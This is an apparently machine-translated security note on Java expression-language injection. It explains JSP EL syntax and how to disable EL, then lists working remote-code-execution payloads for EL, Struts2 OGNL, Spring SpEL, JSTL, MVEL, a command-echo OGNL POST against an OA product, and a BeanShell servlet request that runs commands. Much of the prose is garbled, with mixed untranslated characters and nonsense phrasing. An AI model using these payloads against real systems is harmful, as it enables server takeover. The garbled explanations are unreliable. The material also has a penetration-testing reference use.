Java table expression injection

Sousuke

Java middle table expression type root setting frame division, among which EL table expression expression jsp-like introductory word sound, approval completion jsp transcription and renewal, its design idea origin self ʻECMAScriptsumXPath. Use EL table expression type I can use jsp 页 surface middle 执 line calculation, data number setting, adjustment method, object object operation, etc. Its basic grammar $ {variation table expression}`.

Basic grammar

Most of the grammar is Towa jsp.

获tori change amount

<%@ page import="java.util.HashMap" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%
    String name = "Kozo";
    request.setAttribute("name",name);

    request.setAttribute("request", "request_name");
    session.setAttribute("session", "session_name");
    pageContext.setAttribute("page", "page_name");
    application.setAttribute("application", "application_name");
    HashMap<String, String> map = new HashMap<>();
    map.put("my-name", "admin");
    request.setAttribute("test", map);
%>
Amount of search engine in the four working areas:${name}
</br>
<%--Scope of action--%>
来 requestScope Working area medium 获 removal amount:${requestScope.request}
</br>
来sessionScope Scope of action${sessionScope.session}
</br>
来 pageScope Scope of action Medium 获 removal amount:${pageScope.page}
</br>
来 applicationScope Area of action${applicationScope.application}
</br>
Scope of action Special code change amount:${requestScope.test["my-name"]}

Operation mark

Type	Code
Arithmetic type	+、-(Binary),`*`、/、div、%、mod、-(Unified)
Logic type	and、&&, Or, double tube sign,!、not
Related type	==、eq、!=、ne、<、lt、>、gt、<=、le、>=, Ge. Can give and other 值 advance comparison, or give type, character skewer type, fixed type or floating point type character advance comparison.
Sky	empty Empty operation Prefix operation, available and undecided.
Conditional type	A ?B :C. Rooting A 赋值 -like result coming 赋值 B or C.

Object

pageContext
param paramValues
header headerValues
cookie
initParam
Scope series

function

${ns:func(param1, param2, ...)}

For el table expression expression function required use taglib entry-like standard

Java method for preparation

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@taglib prefix="elFunc" uri="http://www.test.com/elFunc" %>
<%
    String name = "Kozo";
    request.setAttribute("name",name);
%>
Function for adjustment:${elFunc:elFunc(name)}

Export adjustment function: hello 张 3

Forbidden / Forbidden EL table expression ceremony

EL table forbidden to all stations, web.xml

<jsp-config>
    <jsp-property-group>
        <url-pattern>*.jsp</url-pattern>
        <el-ignored>true</el-ignored>
    </jsp-property-group>
</jsp-config>

Forbidden EL table expression ceremony In the JSP text, you can do it.

<%@ page isELIgnored="true" %>

EL table expression for prohibiting display of words, TRUE display prohibited, FALSE display prohibited.

JSP2.0 EL table expression for medium-sized swords.

Table-type injection leak example

Principle Miyako Seiichi Sample: All table expressions or external copy. A proof-of-concept poc in the front row, and a proof-of-concept proof of a set.

Common POC

${pageContext}
${pageContext.getSession().getServletContext().getClassLoader().getResource("")}
${header}
${applicationScope}
${pageContext.setAttribute("a","".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"calc.exe"))}

Struts2 OGNL

@[All names (comprehensive path diameter)]@[Method name|Name]， Example:
@java.lang.String@format('foo %s', 'bar')

Example

ActionContext AC = ActionContext.getContext();
String expression = "${(new java.lang.ProcessBuilder('calc')).start()}";
AC.getValueStack().findValue(expression));

Spring SPEL

String expression = "T(java.lang.Runtime).getRuntime().exec(/"calc/")";
String result = parser.parseExpression(expression).getValue().toString();

JSP JSTL_EL

<spring:message text="${/"/".getClass().forName(/"java.lang.Runtime/").getMethod(/"getRuntime/",null).invoke(null,null).exec(/"calc/",null).toString()}">
</spring:message>

Elasticsearch MVEL

String expression = "new java.lang.ProcessBuilder(/"calc/").start();";  
Boolean result = (Boolean) MVEL.eval(expression, vars);

Minoru OA EL table-type injection

[email protected]@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())

Someone POST

message=(#[email protected]@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami

One kind of reduction

POST /weaver/bsh.servlet.BshServlet
bsh.script=eval%00("ex"%2b"ec(\\"cmd+/c+calc\\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

The bottom

Reflection
unicode
Octal system

reference

[Injection of fine e-mobile ognl](https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3% A8% E5% 85% A5.md)
https://xz.aliyun.com/t/7692
https://www.jianshu.com/p/14e9af313e93
[Appearance type injection](https://misakikata.github.io/2018/09/%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85 % A5 /)